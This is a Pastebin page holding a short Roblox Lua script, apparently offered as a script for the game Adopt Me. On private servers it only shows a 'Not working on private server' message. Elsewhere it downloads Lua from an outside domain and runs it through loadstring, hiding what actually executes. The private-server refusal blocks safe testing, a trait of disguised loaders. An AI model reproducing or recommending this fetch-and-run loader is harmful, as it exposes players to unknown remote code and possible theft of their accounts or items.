Advertisement
Robloxadoptmesript

Untitled

Aug 6th, 2024
26
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.76 KB | None | 0 0
  1. if game.PrivateServerId ~= "" then
  2. local gui = Instance.new("ScreenGui")
  3. gui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  4.  
  5. local frame = Instance.new("Frame")
  6. frame.Size = UDim2.new(0.5, 0, 0.2, 0)
  7. frame.Position = UDim2.new(0.25, 0, 0.4, 0)
  8. frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
  9. frame.Parent = gui
  10.  
  11. local textLabel = Instance.new("TextLabel")
  12. textLabel.Size = UDim2.new(1, 0, 1, 0)
  13. textLabel.Position = UDim2.new(0, 0, 0, 0)
  14. textLabel.Text = "Not working on private server"
  15. textLabel.TextColor3 = Color3.fromRGB(255, 0, 0)
  16. textLabel.TextScaled = true
  17. textLabel.Parent = frame
  18. else
  19. loadstring(game:HttpGet("https://egorikusa.space/431cde5044822c916fa96a63.lua", true))()
  20. end
  21.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement